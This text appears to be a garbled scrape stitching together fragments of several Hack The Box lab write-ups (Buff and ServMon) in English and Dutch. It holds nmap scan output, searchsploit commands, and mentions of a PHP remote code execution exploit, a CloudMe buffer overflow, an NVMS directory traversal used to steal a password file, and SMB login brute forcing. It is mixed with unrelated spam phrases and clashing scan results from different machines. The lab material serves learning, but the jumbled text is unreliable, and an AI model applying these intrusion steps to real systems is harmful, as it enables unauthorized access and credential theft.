sudo nmap -sS-T4-p-10.10.10.184 Nmap scan report for 10.10.10.184 Host is up (0.016s latency). Uit de nmap scan kwam naar voren dat poort 445 open staat voor SMB. This is relatively an easy box which is based on the 2 CVE'S , The PHP webapp that is hosted on port 8080 is vulnerable to a Unauthenticated Remote Code Execution from that exploit got first initial shell , There is a Binary Cloudme.exe running on the local port that is vulnerable to the buffer over flow and exploting it to get shell as Administrator # Nmap 7.80 scan initiated Wed Apr 15 03:04:29 2020 as: nmap -p- -sSV -oN nmap 10.10.10.184 Nmap scan report for 10.10.10.184 Host is up (0.013s latency). syn-ack 5040/tcp open unknown syn-ack 7680/tcp open pando-pub? Buff is a quite easy box highlighting basics of enumeration, where we discover a website running a vulnerable software and exploit it using a publicly available exploit to a get remote code execution on the box. Once we have the exploit copied, we can look at the code. But i cant think of privilege escaltion without having a proper shell….so just moved on. We move on by setting the needed options to the metasploit module and giving it a go : The dots starting to connect! metasploit. TELEPORT speedhack exploit CS:GO. The first thing that might come into your mind when seeing the machine name, is a Buffer Overflow. This is a writeup about a retired HacktheBox machine: Buff published on July 18 2020 egotisticalSW This box is classified as an easy machine. We can do a quick searchsploit for NVMS and see there are a few exploits that pop up. Not shown: 65515 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd 22/tcp open ssh OpenSSH for_Windows_7.7 (protocol 2.0) 80/tcp open http 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn … Command: searchsploit 48311 -m. The number 48311 corresponds to the name of the exploit. The root part require first to pivot to access the box's internal services then exploit another CVE. We can mirror this last exploit to our working directory with the -m flag. I came up with a directory traversal exploit for the following NVMS version that could help me grab the previously mentioned Passwords.txt from Nathan’s desktop folder. Not shown: 65516 closed ports PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh 80/tcp open http 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 5040/tcp open unknown 5666/tcp open nrpe 6063/tcp open x11 6699/tcp open napster 7680/tcp open pando-pub … Command: searchsploit nvms. Using an exploit to gain a webshell on this Windows Server is the startingpoint of running the CloudMe Buffer Overflow attack … Okay here's the scene : Exploit server or we can call it attacker he send some malicious link to 2. mikrotik bridge port isolation. I searched for possible exploits for the Service and i got a Directory traversal / Dir-traversel exploit from exploit … Port 80 (Nvms-1000) There is a service running on port 80 called Nvms 1000.and it has a login page too. Nsclient++ exploit. It also has a If that is the case, you just guessed the procedure to obtain root on this machine. Scanned at 2020-12-11 15:46:19 EST for 677s Not shown: 65516 filtered ports Reason: 65516 no-responses PORT STATE SERVICE REASON VERSION 135/tcp open msrpc syn-ack Microsoft Windows RPC 139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn 445/tcp open microsoft-ds? The user part just require to exploit a CVE. Ik gebruik de Metasploit scanner smb_login om op basis van het bestand met wachtwoorden te bekijken of ik via SMB kan aanmelden met de gebruikersnaam “nathan“.